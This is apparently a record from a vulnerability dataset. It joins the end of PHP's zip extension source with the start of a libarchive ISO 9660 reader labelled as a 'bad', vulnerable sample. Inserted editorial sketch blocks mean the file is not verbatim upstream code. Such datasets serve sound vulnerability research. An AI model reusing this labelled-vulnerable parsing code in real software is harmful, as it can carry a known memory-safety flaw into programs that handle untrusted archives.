REGISTER_ZIP_CLASS_CONST_LONG("ER_SEEK", ZIP_ER_SEEK); /* S Seek error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_READ", ZIP_ER_READ); /* S Read error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_WRITE", ZIP_ER_WRITE); /* S Write error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_CRC", ZIP_ER_CRC); /* N CRC error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_ZIPCLOSED", ZIP_ER_ZIPCLOSED); /* N Containing zip archive was closed */
REGISTER_ZIP_CLASS_CONST_LONG("ER_NOENT", ZIP_ER_NOENT); /* N No such file */
REGISTER_ZIP_CLASS_CONST_LONG("ER_EXISTS", ZIP_ER_EXISTS); /* N File already exists */
REGISTER_ZIP_CLASS_CONST_LONG("ER_OPEN", ZIP_ER_OPEN); /* S Can't open file */
REGISTER_ZIP_CLASS_CONST_LONG("ER_TMPOPEN", ZIP_ER_TMPOPEN); /* S Failure to create temporary file */
REGISTER_ZIP_CLASS_CONST_LONG("ER_ZLIB", ZIP_ER_ZLIB); /* Z Zlib error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_MEMORY", ZIP_ER_MEMORY); /* N Malloc failure */
REGISTER_ZIP_CLASS_CONST_LONG("ER_CHANGED", ZIP_ER_CHANGED); /* N Entry has been changed */
REGISTER_ZIP_CLASS_CONST_LONG("ER_COMPNOTSUPP", ZIP_ER_COMPNOTSUPP);/* N Compression method not supported */
REGISTER_ZIP_CLASS_CONST_LONG("ER_EOF", ZIP_ER_EOF); /* N Premature EOF */
REGISTER_ZIP_CLASS_CONST_LONG("ER_INVAL", ZIP_ER_INVAL); /* N Invalid argument */
REGISTER_ZIP_CLASS_CONST_LONG("ER_NOZIP", ZIP_ER_NOZIP); /* N Not a zip archive */
REGISTER_ZIP_CLASS_CONST_LONG("ER_INTERNAL", ZIP_ER_INTERNAL); /* N Internal error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_INCONS", ZIP_ER_INCONS); /* N Zip archive inconsistent */
REGISTER_ZIP_CLASS_CONST_LONG("ER_REMOVE", ZIP_ER_REMOVE); /* S Can't remove file */
REGISTER_ZIP_CLASS_CONST_LONG("ER_DELETED", ZIP_ER_DELETED); /* N Entry has been deleted */
#ifdef ZIP_OPSYS_DEFAULT
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_DOS", ZIP_OPSYS_DOS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_AMIGA", ZIP_OPSYS_AMIGA);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_OPENVMS", ZIP_OPSYS_OPENVMS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_UNIX", ZIP_OPSYS_UNIX);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_VM_CMS", ZIP_OPSYS_VM_CMS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_ATARI_ST", ZIP_OPSYS_ATARI_ST);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_OS_2", ZIP_OPSYS_OS_2);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_MACINTOSH", ZIP_OPSYS_MACINTOSH);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_Z_SYSTEM", ZIP_OPSYS_Z_SYSTEM);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_Z_CPM", ZIP_OPSYS_CPM);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_WINDOWS_NTFS", ZIP_OPSYS_WINDOWS_NTFS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_MVS", ZIP_OPSYS_MVS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_VSE", ZIP_OPSYS_VSE);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_ACORN_RISC", ZIP_OPSYS_ACORN_RISC);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_VFAT", ZIP_OPSYS_VFAT);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_ALTERNATE_MVS", ZIP_OPSYS_ALTERNATE_MVS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_BEOS", ZIP_OPSYS_BEOS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_TANDEM", ZIP_OPSYS_TANDEM);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_OS_400", ZIP_OPSYS_OS_400);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_OS_X", ZIP_OPSYS_OS_X);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_DEFAULT", ZIP_OPSYS_DEFAULT);
#endif /* ifdef ZIP_OPSYS_DEFAULT */
php_register_url_stream_wrapper("zip", &php_stream_zip_wrapper);
le_zip_dir = zend_register_list_destructors_ex(php_zip_free_dir, NULL, le_zip_dir_name, module_number);
le_zip_entry = zend_register_list_destructors_ex(php_zip_free_entry, NULL, le_zip_entry_name, module_number);
return SUCCESS;
}
/* }}} */
/* {{{ PHP_MSHUTDOWN_FUNCTION
*/
static PHP_MSHUTDOWN_FUNCTION(zip)
{
zend_hash_destroy(&zip_prop_handlers);
php_unregister_url_stream_wrapper("zip");
return SUCCESS;
}
/* }}} */
/* {{{ PHP_MINFO_FUNCTION
*/
static PHP_MINFO_FUNCTION(zip)
{
php_info_print_table_start();
php_info_print_table_row(2, "Zip", "enabled");
php_info_print_table_row(2, "Zip version", PHP_ZIP_VERSION);
php_info_print_table_row(2, "Libzip version", LIBZIP_VERSION);
php_info_print_table_end();
}
/* }}} */
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* End:
* vim600: noet sw=4 ts=4 fdm=marker
* vim<600: noet sw=4 ts=4
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_4988_0 |
crossvul-cpp_data_bad_5181_0 | /*-
* Copyright (c) 2003-2007 Tim Kientzle
* Copyright (c) 2009 Andreas Henriksson <andreas@fatal.se>
* Copyright (c) 2009-2012 Michihiro NAKAJIMA
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "archive_platform.h"
__FBSDID("$FreeBSD: head/lib/libarchive/archive_read_support_format_iso9660.c 201246 2009-12-30 05:30:35Z kientzle $");
#ifdef HAVE_ERRNO_H
#include <errno.h>
#endif
/* #include <stdint.h> */ /* See archive_platform.h */
#include <stdio.h>
#ifdef HAVE_STDLIB_H
#include <stdlib.h>
#endif
#ifdef HAVE_STRING_H
#include <string.h>
#endif
#include <time.h>
#ifdef HAVE_ZLIB_H
#include <zlib.h>
#endif
#include "archive.h"
#include "archive_endian.h"
#include "archive_entry.h"
#include "archive_entry_locale.h"
#include "archive_private.h"
#include "archive_read_private.h"
#include "archive_string.h"
/*
* An overview of ISO 9660 format:
*
* Each disk is laid out as follows:
* * 32k reserved for private use
* * Volume descriptor table. Each volume descriptor
* is 2k and specifies basic format information.
* The "Primary Volume Descriptor" (PVD) is defined by the
* standard and should always be present; other volume
* descriptors include various vendor-specific extensions.
* * Files and directories. Each file/dir is specified by
* an "extent" (starting sector and length in bytes).
* Dirs are just files with directory records packed one
* after another. The PVD contains a single dir entry
* specifying the location of the root directory. Everything
* else follows from there.
*
* This module works by first reading the volume descriptors, then
* building a list of directory entries, sorted by starting
* sector. At each step, I look for the earliest dir entry that
* hasn't yet been read, seek forward to that location and read
* that entry. If it's a dir, I slurp in the new dir entries and
* add them to the heap; if it's a regular file, I return the
* corresponding archive_entry and wait for the client to request
* the file body. This strategy allows us to read most compliant
* CDs with a single pass through the data, as required by libarchive.
*/
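/*
* Editorial sketch, not part of the original libarchive source: the
* "earliest unread extent" strategy described above is easiest to picture
* as a binary min-heap keyed by each entry's starting offset. The
* hypothetical, self-contained example below illustrates only that idea;
* the real implementation is the heap_queue / heap_add_entry /
* heap_get_entry code later in this file, which manages its own
* allocation and error reporting.
*/
#if 0 /* illustrative sketch only, kept out of the build on purpose */
struct example_offset_heap {
uint64_t keys[64]; /* starting offsets; smallest value sits at keys[0] */
int used;
};
/* Push a new starting offset; caller must ensure used < 64. */
static void
example_heap_push(struct example_offset_heap *h, uint64_t key)
{
int i = h->used++;
/* Sift the new key up until its parent is no larger. */
while (i > 0 && h->keys[(i - 1) / 2] > key) {
h->keys[i] = h->keys[(i - 1) / 2];
i = (i - 1) / 2;
}
h->keys[i] = key;
}
/* Pop the smallest offset; caller must ensure used > 0. */
static uint64_t
example_heap_pop(struct example_offset_heap *h)
{
uint64_t top = h->keys[0];
uint64_t last = h->keys[--h->used];
int i = 0, child;
/* Sift the former last element down to restore heap order. */
while ((child = 2 * i + 1) < h->used) {
if (child + 1 < h->used && h->keys[child + 1] < h->keys[child])
child++;
if (last <= h->keys[child])
break;
h->keys[i] = h->keys[child];
i = child;
}
h->keys[i] = last;
return (top);
}
#endif /* illustrative sketch only */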
#define LOGICAL_BLOCK_SIZE 2048
#define SYSTEM_AREA_BLOCK 16
/* Structure of on-disk primary volume descriptor. */
#define PVD_type_offset 0
#define PVD_type_size 1
#define PVD_id_offset (PVD_type_offset + PVD_type_size)
#define PVD_id_size 5
#define PVD_version_offset (PVD_id_offset + PVD_id_size)
#define PVD_version_size 1
#define PVD_reserved1_offset (PVD_version_offset + PVD_version_size)
#define PVD_reserved1_size 1
#define PVD_system_id_offset (PVD_reserved1_offset + PVD_reserved1_size)
#define PVD_system_id_size 32
#define PVD_volume_id_offset (PVD_system_id_offset + PVD_system_id_size)
#define PVD_volume_id_size 32
#define PVD_reserved2_offset (PVD_volume_id_offset + PVD_volume_id_size)
#define PVD_reserved2_size 8
#define PVD_volume_space_size_offset (PVD_reserved2_offset + PVD_reserved2_size)
#define PVD_volume_space_size_size 8
#define PVD_reserved3_offset (PVD_volume_space_size_offset + PVD_volume_space_size_size)
#define PVD_reserved3_size 32
#define PVD_volume_set_size_offset (PVD_reserved3_offset + PVD_reserved3_size)
#define PVD_volume_set_size_size 4
#define PVD_volume_sequence_number_offset (PVD_volume_set_size_offset + PVD_volume_set_size_size)
#define PVD_volume_sequence_number_size 4
#define PVD_logical_block_size_offset (PVD_volume_sequence_number_offset + PVD_volume_sequence_number_size)
#define PVD_logical_block_size_size 4
#define PVD_path_table_size_offset (PVD_logical_block_size_offset + PVD_logical_block_size_size)
#define PVD_path_table_size_size 8
#define PVD_type_1_path_table_offset (PVD_path_table_size_offset + PVD_path_table_size_size)
#define PVD_type_1_path_table_size 4
#define PVD_opt_type_1_path_table_offset (PVD_type_1_path_table_offset + PVD_type_1_path_table_size)
#define PVD_opt_type_1_path_table_size 4
#define PVD_type_m_path_table_offset (PVD_opt_type_1_path_table_offset + PVD_opt_type_1_path_table_size)
#define PVD_type_m_path_table_size 4
#define PVD_opt_type_m_path_table_offset (PVD_type_m_path_table_offset + PVD_type_m_path_table_size)
#define PVD_opt_type_m_path_table_size 4
#define PVD_root_directory_record_offset (PVD_opt_type_m_path_table_offset + PVD_opt_type_m_path_table_size)
#define PVD_root_directory_record_size 34
#define PVD_volume_set_id_offset (PVD_root_directory_record_offset + PVD_root_directory_record_size)
#define PVD_volume_set_id_size 128
#define PVD_publisher_id_offset (PVD_volume_set_id_offset + PVD_volume_set_id_size)
#define PVD_publisher_id_size 128
#define PVD_preparer_id_offset (PVD_publisher_id_offset + PVD_publisher_id_size)
#define PVD_preparer_id_size 128
#define PVD_application_id_offset (PVD_preparer_id_offset + PVD_preparer_id_size)
#define PVD_application_id_size 128
#define PVD_copyright_file_id_offset (PVD_application_id_offset + PVD_application_id_size)
#define PVD_copyright_file_id_size 37
#define PVD_abstract_file_id_offset (PVD_copyright_file_id_offset + PVD_copyright_file_id_size)
#define PVD_abstract_file_id_size 37
#define PVD_bibliographic_file_id_offset (PVD_abstract_file_id_offset + PVD_abstract_file_id_size)
#define PVD_bibliographic_file_id_size 37
#define PVD_creation_date_offset (PVD_bibliographic_file_id_offset + PVD_bibliographic_file_id_size)
#define PVD_creation_date_size 17
#define PVD_modification_date_offset (PVD_creation_date_offset + PVD_creation_date_size)
#define PVD_modification_date_size 17
#define PVD_expiration_date_offset (PVD_modification_date_offset + PVD_modification_date_size)
#define PVD_expiration_date_size 17
#define PVD_effective_date_offset (PVD_expiration_date_offset + PVD_expiration_date_size)
#define PVD_effective_date_size 17
#define PVD_file_structure_version_offset (PVD_effective_date_offset + PVD_effective_date_size)
#define PVD_file_structure_version_size 1
#define PVD_reserved4_offset (PVD_file_structure_version_offset + PVD_file_structure_version_size)
#define PVD_reserved4_size 1
#define PVD_application_data_offset (PVD_reserved4_offset + PVD_reserved4_size)
#define PVD_application_data_size 512
#define PVD_reserved5_offset (PVD_application_data_offset + PVD_application_data_size)
#define PVD_reserved5_size (2048 - PVD_reserved5_offset)
/* TODO: It would make future maintenance easier to just hardcode the
* above values. In particular, ECMA119 states the offsets as part of
* the standard. That would eliminate the need for the following check.*/
#if PVD_reserved5_offset != 1395
#error PVD offset and size definitions are wrong.
#endif
/* Structure of optional on-disk supplementary volume descriptor. */
#define SVD_type_offset 0
#define SVD_type_size 1
#define SVD_id_offset (SVD_type_offset + SVD_type_size)
#define SVD_id_size 5
#define SVD_version_offset (SVD_id_offset + SVD_id_size)
#define SVD_version_size 1
/* ... */
#define SVD_reserved1_offset 72
#define SVD_reserved1_size 8
#define SVD_volume_space_size_offset 80
#define SVD_volume_space_size_size 8
#define SVD_escape_sequences_offset (SVD_volume_space_size_offset + SVD_volume_space_size_size)
#define SVD_escape_sequences_size 32
/* ... */
#define SVD_logical_block_size_offset 128
#define SVD_logical_block_size_size 4
#define SVD_type_L_path_table_offset 140
#define SVD_type_M_path_table_offset 148
/* ... */
#define SVD_root_directory_record_offset 156
#define SVD_root_directory_record_size 34
#define SVD_file_structure_version_offset 881
#define SVD_reserved2_offset 882
#define SVD_reserved2_size 1
#define SVD_reserved3_offset 1395
#define SVD_reserved3_size 653
/* ... */
/* FIXME: validate correctness of last SVD entry offset. */
/* Structure of an on-disk directory record. */
/* Note: ISO9660 stores each multi-byte integer twice, once in
* each byte order. The sizes here are the size of just one
* of the two integers. (This is why the offset of a field isn't
* the same as the offset+size of the previous field.) */
#define DR_length_offset 0
#define DR_length_size 1
#define DR_ext_attr_length_offset 1
#define DR_ext_attr_length_size 1
#define DR_extent_offset 2
#define DR_extent_size 4
#define DR_size_offset 10
#define DR_size_size 4
#define DR_date_offset 18
#define DR_date_size 7
#define DR_flags_offset 25
#define DR_flags_size 1
#define DR_file_unit_size_offset 26
#define DR_file_unit_size_size 1
#define DR_interleave_offset 27
#define DR_interleave_size 1
#define DR_volume_sequence_number_offset 28
#define DR_volume_sequence_number_size 2
#define DR_name_len_offset 32
#define DR_name_len_size 1
#define DR_name_offset 33
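/*
* Editorial sketch, not part of the original libarchive source: each
* "both byte order" field above stores its value twice, little-endian
* first and big-endian second, which is why a field's offset is not
* simply the previous field's offset plus its size. The hypothetical
* helper below shows how the little-endian copy of a 4-byte field such
* as DR_extent or DR_size could be decoded; this module actually uses
* toi() and the archive_endian.h helpers for that job.
*/
#if 0 /* illustrative sketch only, kept out of the build on purpose */
static uint32_t
example_read_both_byte_order_u32(const unsigned char *p)
{
/* p points at the 8-byte field: bytes 0-3 hold the LE copy and
* bytes 4-7 repeat the same value in BE order (useful for checking). */
return ((uint32_t)p[0])
| ((uint32_t)p[1] << 8)
| ((uint32_t)p[2] << 16)
| ((uint32_t)p[3] << 24);
}
#endif /* illustrative sketch only */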
#ifdef HAVE_ZLIB_H
static const unsigned char zisofs_magic[8] = {
0x37, 0xE4, 0x53, 0x96, 0xC9, 0xDB, 0xD6, 0x07
};
struct zisofs {
/* Set 1 if this file compressed by paged zlib */
int pz;
int pz_log2_bs; /* Log2 of block size */
uint64_t pz_uncompressed_size;
int initialized;
unsigned char *uncompressed_buffer;
size_t uncompressed_buffer_size;
uint32_t pz_offset;
unsigned char header[16];
size_t header_avail;
int header_passed;
unsigned char *block_pointers;
size_t block_pointers_alloc;
size_t block_pointers_size;
size_t block_pointers_avail;
size_t block_off;
uint32_t block_avail;
z_stream stream;
int stream_valid;
};
#else
struct zisofs {
/* Set 1 if this file compressed by paged zlib */
int pz;
};
#endif
struct content {
uint64_t offset;/* Offset on disk. */
uint64_t size; /* File size in bytes. */
struct content *next;
};
/* In-memory storage for a directory record. */
struct file_info {
struct file_info *use_next;
struct file_info *parent;
struct file_info *next;
struct file_info *re_next;
int subdirs;
uint64_t key; /* Heap Key. */
uint64_t offset; /* Offset on disk. */
uint64_t size; /* File size in bytes. */
uint32_t ce_offset; /* Offset of CE. */
uint32_t ce_size; /* Size of CE. */
char rr_moved; /* Flag to rr_moved. */
char rr_moved_has_re_only;
char re; /* Having RRIP "RE" extension. */
char re_descendant;
uint64_t cl_offset; /* Having RRIP "CL" extension. */
int birthtime_is_set;
time_t birthtime; /* File created time. */
time_t mtime; /* File last modified time. */
time_t atime; /* File last accessed time. */
time_t ctime; /* File attribute change time. */
uint64_t rdev; /* Device number. */
mode_t mode;
uid_t uid;
gid_t gid;
int64_t number;
int nlinks;
struct archive_string name; /* Pathname */
unsigned char *utf16be_name;
size_t utf16be_bytes;
char name_continues; /* Non-zero if name continues */
struct archive_string symlink;
char symlink_continues; /* Non-zero if link continues */
/* Set 1 if this file compressed by paged zlib(zisofs) */
int pz;
int pz_log2_bs; /* Log2 of block size */
uint64_t pz_uncompressed_size;
/* Set 1 if this file is multi extent. */
int multi_extent;
struct {
struct content *first;
struct content **last;
} contents;
struct {
struct file_info *first;
struct file_info **last;
} rede_files;
};
struct heap_queue {
struct file_info **files;
int allocated;
int used;
};
struct iso9660 {
int magic;
#define ISO9660_MAGIC 0x96609660
int opt_support_joliet;
int opt_support_rockridge;
struct archive_string pathname;
char seenRockridge; /* Set true if RR extensions are used. */
char seenSUSP; /* Set true if SUSP is being used. */
char seenJoliet;
unsigned char suspOffset;
struct file_info *rr_moved;
struct read_ce_queue {
struct read_ce_req {
uint64_t offset;/* Offset of CE on disk. */
struct file_info *file;
} *reqs;
int cnt;
int allocated;
} read_ce_req;
int64_t previous_number;
struct archive_string previous_pathname;
struct file_info *use_files;
struct heap_queue pending_files;
struct {
struct file_info *first;
struct file_info **last;
} cache_files;
struct {
struct file_info *first;
struct file_info **last;
} re_files;
uint64_t current_position;
ssize_t logical_block_size;
uint64_t volume_size; /* Total size of volume in bytes. */
int32_t volume_block;/* Total size of volume in logical blocks. */
struct vd {
int location; /* Location of Extent. */
uint32_t size;
} primary, joliet;
int64_t entry_sparse_offset;
int64_t entry_bytes_remaining;
size_t entry_bytes_unconsumed;
struct zisofs entry_zisofs;
struct content *entry_content;
struct archive_string_conv *sconv_utf16be;
/*
* Buffers for a full pathname in UTF-16BE in Joliet extensions.
*/
#define UTF16_NAME_MAX 1024
unsigned char *utf16be_path;
size_t utf16be_path_len;
unsigned char *utf16be_previous_path;
size_t utf16be_previous_path_len;
/* Null buffer used in the bidder to speed up all-zero field checks. */
unsigned char null[2048];
};
static int archive_read_format_iso9660_bid(struct archive_read *, int);
static int archive_read_format_iso9660_options(struct archive_read *,
const char *, const char *);
static int archive_read_format_iso9660_cleanup(struct archive_read *);
static int archive_read_format_iso9660_read_data(struct archive_read *,
const void **, size_t *, int64_t *);
static int archive_read_format_iso9660_read_data_skip(struct archive_read *);
static int archive_read_format_iso9660_read_header(struct archive_read *,
struct archive_entry *);
static const char *build_pathname(struct archive_string *, struct file_info *, int);
static int build_pathname_utf16be(unsigned char *, size_t, size_t *,
struct file_info *);
#if DEBUG
static void dump_isodirrec(FILE *, const unsigned char *isodirrec);
#endif
static time_t time_from_tm(struct tm *);
static time_t isodate17(const unsigned char *);
static time_t isodate7(const unsigned char *);
static int isBootRecord(struct iso9660 *, const unsigned char *);
static int isVolumePartition(struct iso9660 *, const unsigned char *);
static int isVDSetTerminator(struct iso9660 *, const unsigned char *);
static int isJolietSVD(struct iso9660 *, const unsigned char *);
static int isSVD(struct iso9660 *, const unsigned char *);
static int isEVD(struct iso9660 *, const unsigned char *);
static int isPVD(struct iso9660 *, const unsigned char *);
static int next_cache_entry(struct archive_read *, struct iso9660 *,
struct file_info **);
static int next_entry_seek(struct archive_read *, struct iso9660 *,
struct file_info **);
static struct file_info *
parse_file_info(struct archive_read *a,
struct file_info *parent, const unsigned char *isodirrec);
static int parse_rockridge(struct archive_read *a,
struct file_info *file, const unsigned char *start,
const unsigned char *end);
static int register_CE(struct archive_read *a, int32_t location,
struct file_info *file);
static int read_CE(struct archive_read *a, struct iso9660 *iso9660);
static void parse_rockridge_NM1(struct file_info *,
const unsigned char *, int);
static void parse_rockridge_SL1(struct file_info *,
const unsigned char *, int);
static void parse_rockridge_TF1(struct file_info *,
const unsigned char *, int);
static void parse_rockridge_ZF1(struct file_info *,
const unsigned char *, int);
static void register_file(struct iso9660 *, struct file_info *);
static void release_files(struct iso9660 *);
static unsigned toi(const void *p, int n);
static inline void re_add_entry(struct iso9660 *, struct file_info *);
static inline struct file_info * re_get_entry(struct iso9660 *);
static inline int rede_add_entry(struct file_info *);
static inline struct file_info * rede_get_entry(struct file_info *);
static inline void cache_add_entry(struct iso9660 *iso9660,
struct file_info *file);
static inline struct file_info *cache_get_entry(struct iso9660 *iso9660);
static int heap_add_entry(struct archive_read *a, struct heap_queue *heap,
struct file_info *file, uint64_t key);
static struct file_info *heap_get_entry(struct heap_queue *heap);
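/* Convenience wrappers around the pending_files heap: queue a
 * directory record keyed by its on-disk offset, and pop the entry
 * with the smallest offset. */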
#define add_entry(arch, iso9660, file) \
heap_add_entry(arch, &((iso9660)->pending_files), file, file->offset)
#define next_entry(iso9660) \
heap_get_entry(&((iso9660)->pending_files))
int
archive_read_support_format_iso9660(struct archive *_a)
{
struct archive_read *a = (struct archive_read *)_a;
struct iso9660 *iso9660;
int r;
archive_check_magic(_a, ARCHIVE_READ_MAGIC,
ARCHIVE_STATE_NEW, "archive_read_support_format_iso9660");
iso9660 = (struct iso9660 *)calloc(1, sizeof(*iso9660));
if (iso9660 == NULL) {
archive_set_error(&a->archive, ENOMEM,
"Can't allocate iso9660 data");
return (ARCHIVE_FATAL);
}
iso9660->magic = ISO9660_MAGIC;
iso9660->cache_files.first = NULL;
iso9660->cache_files.last = &(iso9660->cache_files.first);
iso9660->re_files.first = NULL;
iso9660->re_files.last = &(iso9660->re_files.first);
/* Enable support for Joliet extensions by default. */
iso9660->opt_support_joliet = 1;
/* Enable support for Rock Ridge extensions by default. */
iso9660->opt_support_rockridge = 1;
r = __archive_read_register_format(a,
iso9660,
"iso9660",
archive_read_format_iso9660_bid,
archive_read_format_iso9660_options,
archive_read_format_iso9660_read_header,
archive_read_format_iso9660_read_data,
archive_read_format_iso9660_read_data_skip,
NULL,
archive_read_format_iso9660_cleanup,
NULL,
NULL);
if (r != ARCHIVE_OK) {
free(iso9660);
return (r);
}
return (ARCHIVE_OK);
}
static int
archive_read_format_iso9660_bid(struct archive_read *a, int best_bid)
{
struct iso9660 *iso9660;
ssize_t bytes_read;
const unsigned char *p;
int seenTerminator;
/* If there's already a better bid than we can ever
make, don't bother testing. */
if (best_bid > 48)
return (-1);
iso9660 = (struct iso9660 *)(a->format->data);
/*
* Skip the first 32k (reserved area) and get the first
* 8 sectors of the volume descriptor table. Of course,
* if the I/O layer gives us more, we'll take it.
*/
#define RESERVED_AREA (SYSTEM_AREA_BLOCK * LOGICAL_BLOCK_SIZE)
p = __archive_read_ahead(a,
RESERVED_AREA + 8 * LOGICAL_BLOCK_SIZE,
&bytes_read);
if (p == NULL)
return (-1);
/* Skip the reserved area. */
bytes_read -= RESERVED_AREA;
p += RESERVED_AREA;
/* Check each volume descriptor. */
seenTerminator = 0;
for (; bytes_read > LOGICAL_BLOCK_SIZE;
bytes_read -= LOGICAL_BLOCK_SIZE, p += LOGICAL_BLOCK_SIZE) {
/* Do not handle undefined Volume Descriptor Type. */
if (p[0] >= 4 && p[0] <= 254)
return (0);
/* Standard Identifier must be "CD001" */
if (memcmp(p + 1, "CD001", 5) != 0)
return (0);
if (isPVD(iso9660, p))
continue;
if (!iso9660->joliet.location) {
if (isJolietSVD(iso9660, p))
continue;
}
if (isBootRecord(iso9660, p))
continue;
if (isEVD(iso9660, p))
continue;
if (isSVD(iso9660, p))
continue;
if (isVolumePartition(iso9660, p))
continue;
if (isVDSetTerminator(iso9660, p)) {
seenTerminator = 1;
break;
}
return (0);
}
/*
* ISO 9660 format must have Primary Volume Descriptor and
* Volume Descriptor Set Terminator.
*/
if (seenTerminator && iso9660->primary.location > 16)
return (48);
/* We didn't find a valid PVD; return a bid of zero. */
return (0);
}
static int
archive_read_format_iso9660_options(struct archive_read *a,
const char *key, const char *val)
{
struct iso9660 *iso9660;
iso9660 = (struct iso9660 *)(a->format->data);
if (strcmp(key, "joliet") == 0) {
if (val == NULL || strcmp(val, "off") == 0 ||
strcmp(val, "ignore") == 0 ||
strcmp(val, "disable") == 0 ||
strcmp(val, "0") == 0)
iso9660->opt_support_joliet = 0;
else
iso9660->opt_support_joliet = 1;
return (ARCHIVE_OK);
}
if (strcmp(key, "rockridge") == 0 ||
strcmp(key, "Rockridge") == 0) {
iso9660->opt_support_rockridge = val != NULL;
return (ARCHIVE_OK);
}
/* Note: The "warn" return is just to inform the options
* supervisor that we didn't handle it. It will generate
* a suitable error if no one used this option. */
return (ARCHIVE_WARN);
}
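/* Return non-zero if 'bytes' bytes of the descriptor at h + offset are
 * all zero. The data is compared against the pre-zeroed null[] buffer
 * in 2048-byte chunks to keep volume-descriptor checks cheap. */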
static int
isNull(struct iso9660 *iso9660, const unsigned char *h, unsigned offset,
unsigned bytes)
{
while (bytes >= sizeof(iso9660->null)) {
if (memcmp(iso9660->null, h + offset, sizeof(iso9660->null)) != 0)
return (0);
offset += sizeof(iso9660->null);
bytes -= sizeof(iso9660->null);
}
if (bytes)
return memcmp(iso9660->null, h + offset, bytes) == 0;
else
return (1);
}
static int
isBootRecord(struct iso9660 *iso9660, const unsigned char *h)
{
(void)iso9660; /* UNUSED */
/* Type of the Volume Descriptor Boot Record must be 0. */
if (h[0] != 0)
return (0);
/* Volume Descriptor Version must be 1. */
if (h[6] != 1)
return (0);
return (1);
}
static int
isVolumePartition(struct iso9660 *iso9660, const unsigned char *h)
{
int32_t location;
/* Type of the Volume Partition Descriptor must be 3. */
if (h[0] != 3)
return (0);
/* Volume Descriptor Version must be 1. */
if (h[6] != 1)
return (0);
/* Unused Field */
if (h[7] != 0)
return (0);
location = archive_le32dec(h + 72);
if (location <= SYSTEM_AREA_BLOCK ||
location >= iso9660->volume_block)
return (0);
if ((uint32_t)location != archive_be32dec(h + 76))
return (0);
return (1);
}
static int
isVDSetTerminator(struct iso9660 *iso9660, const unsigned char *h)
{
(void)iso9660; /* UNUSED */
/* Type of the Volume Descriptor Set Terminator must be 255. */
if (h[0] != 255)
return (0);
/* Volume Descriptor Version must be 1. */
if (h[6] != 1)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, 7, 2048-7))
return (0);
return (1);
}
static int
isJolietSVD(struct iso9660 *iso9660, const unsigned char *h)
{
const unsigned char *p;
ssize_t logical_block_size;
int32_t volume_block;
/* Check if current sector is a kind of Supplementary Volume
* Descriptor. */
if (!isSVD(iso9660, h))
return (0);
/* FIXME: add more validation according to the Joliet spec. */
/* Check whether this SVD contains the Joliet escape sequences. */
p = h + SVD_escape_sequences_offset;
/* N.B. Joliet spec says p[1] == '\\', but.... */
if (p[0] == '%' && p[1] == '/') {
int level = 0;
if (p[2] == '@')
level = 1;
else if (p[2] == 'C')
level = 2;
else if (p[2] == 'E')
level = 3;
else /* not joliet */
return (0);
iso9660->seenJoliet = level;
} else /* not joliet */
return (0);
logical_block_size =
archive_le16dec(h + SVD_logical_block_size_offset);
volume_block = archive_le32dec(h + SVD_volume_space_size_offset);
iso9660->logical_block_size = logical_block_size;
iso9660->volume_block = volume_block;
iso9660->volume_size = logical_block_size * (uint64_t)volume_block;
/* Read Root Directory Record in Volume Descriptor. */
p = h + SVD_root_directory_record_offset;
iso9660->joliet.location = archive_le32dec(p + DR_extent_offset);
iso9660->joliet.size = archive_le32dec(p + DR_size_offset);
return (48);
}
static int
isSVD(struct iso9660 *iso9660, const unsigned char *h)
{
const unsigned char *p;
ssize_t logical_block_size;
int32_t volume_block;
int32_t location;
(void)iso9660; /* UNUSED */
/* Type 2 means it's a SVD. */
if (h[SVD_type_offset] != 2)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, SVD_reserved1_offset, SVD_reserved1_size))
return (0);
